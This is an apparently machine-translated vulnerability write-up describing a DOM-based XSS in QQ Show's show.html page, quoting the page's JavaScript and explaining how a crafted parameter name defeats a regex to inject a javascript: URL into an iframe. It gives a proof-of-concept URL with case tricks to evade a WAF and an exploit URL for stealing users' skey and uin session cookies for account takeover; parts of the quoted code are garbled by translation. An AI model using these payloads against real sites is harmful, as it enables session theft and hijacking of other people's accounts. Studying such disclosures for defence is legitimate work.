Dom xss mining and Analysis of a business master station in QQ

Dom xss mining and Analysis of a business master station in QQ

Attackers can steal the skey and uin from all browsers without blocking them.

When mining flashxss, we accidentally discovered such a URL during decompilation:

Show.qq.com is a main business of qqxiu.

To show.html, see the following code:

Var aNUrl = {"M ":" http://imgcache.qq.com/qqshow_v3/htdocs /Inc/main.html "," T ":" http://imgcache.qq.com/qqshow_v3/htdocs /Inc/header.html "," L ":" http://imgcache.qq.com/qqshow_v3/htdocs /Inc/sidebar.html "}; var sUrl = QSFL. excore. getURLParam (" MUrl "). replace (/ http:////show.qq.com/ ," http://imgcache.qq.com/qqshow_v3/htdocs "); (SUrl & CheckUrlCredit4Frames (sUrl) & (aNUrl [" M "] = Rel2Abs (sUrl); var sUrl = QSFL. excore. getURLParam ("LUrl"); (sUrl & CheckUrlCredit4Frames (sUrl) & (aNUrl ["L"] = Rel2Abs (sUrl); var sUrl = QSFL. excore. getURLParam ("TUrl"); (sUrl & CheckUrlCredit4Frames (sUrl) & (aNUrl ["T"] = Rel2Abs (sUrl ));...... var uPrm = window. location. href. split ("? "); // From location. obtain uPrm var _ Prm = new QSFL in href. excore. param (uPrm [1] | "", "&", "="); // obtain the GET parameter for (var xName in _ Prm) {if (typeof (_ Prm [xName]) = "string" & xName! = "MUrl" & xName! = "LUrl" & xName! = "TUrl") // xName is the key, _ Prm [xName] is the value {aNUrl ["M"] = QSFL. excore. setURLParam (aNUrl ["M"], xName, _ Prm [xName]); aNUrl ["L"] = QSFL. excore. setURLParam (aNUrl ["L"], xName, _ Prm [xName]); aNUrl ["T"] = QSFL. excore. setURLParam (aNUrl ["T"], xName, _ Prm [xName]);} ...... QSFL. $ ("headerFrame "). src = aNUrl ["T"]; QSFL. $ ("sideFrame "). src = aNUrl ["L"]; QSFL. $ ("mainFrame "). src = aNUrl ["M"];

 

The above three statements may obviously exist in xss. QSFL. $ ("headerFrame") is an iframe object. Its src attribute can be javascript protocol, that is, <iframe src = javascript: alert (1)>. Therefore, as long as you can control the first part of aNUrl ["T"];, a dom xss without interaction can be created.

To control aNUrl ["T"], check the QSFL. excore. setURLParam function. The first parameter of QSFL. excore. setURLParam is the preset delimiter.

Go to QSFL. excore. setURLParam.

QSFL.excore.setURLParam = function(sUrl, sName, sValue)   {      sUrl = sUrl.toString();      sName = sName.toString();      sValue = sValue.toString().escUrl();      var r = new RegExp("(^|//W)" + sName + "=[^&]*", "g");      var vUrl = sUrl.split("#");      vUrl[0] = (vUrl[0].match(r)) ? vUrl[0].replace(r, "$1" + sName + "=" + sValue) : vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "="       + sValue;      return vUrl.join("#");  };

 

First, let's take a look at the train of thought. We cannot control the three parameters of this function, sUrl, but sName and sValue can be controlled, but they cannot contain &, =.

What is the main part? : Select character. If you can run vUrl [0]. replace (r, "$1" + sName + "=" + sValue), because we can control sName, we can control the first half of the url; if you are running vUrl [0] + (vUrl [0]. indexOf ("? ") =-1? "? ":" & ") + SName +" = "+ sValue;, vUrl [0] Is sUrl. We cannot control the first half, so we cannot.

So let's take a look at how to make this three-object operator execute the first one. See this regular expression: RegExp ("(^ | \ W)" + sName + "= [^ &] *", "g ");. Put the sName into a regular expression.

You only need to match vUrl [0] with this regular expression. What should I do?

Let the sName include or "|", that is, "| http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html |", the whole regular is "(^ | \ W) | http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html | = [^ &] * ", certainly can match on http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html.
We add javascript: alert (1) // before the sName, And the last returned URL is javascript: alert (1) // | http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html | = 1, such a URL is placed in the src attribute of iframe to create an XSS.
In fact, I found that the server WAF will filter some keywords, such as javascript:, ". javascript can be case-insensitive, and quotation marks are completely unnecessary. We can replace them with //. source.
Provide a POC:

Http://show.qq.com/show.html? JavAScripT: alert (1) // | http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html | = 1

Visible pop-up window:

Write an EXP for cookie Stealing:

 

Http://show.qq.com/show.html? JavAScripT: eval (atob (/examples/. source) // | http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html | = 1

This can be run in chrome.
It is tested that skey and uin can be stolen, and these two can be used to log on to another person's space and do a lot of evil things.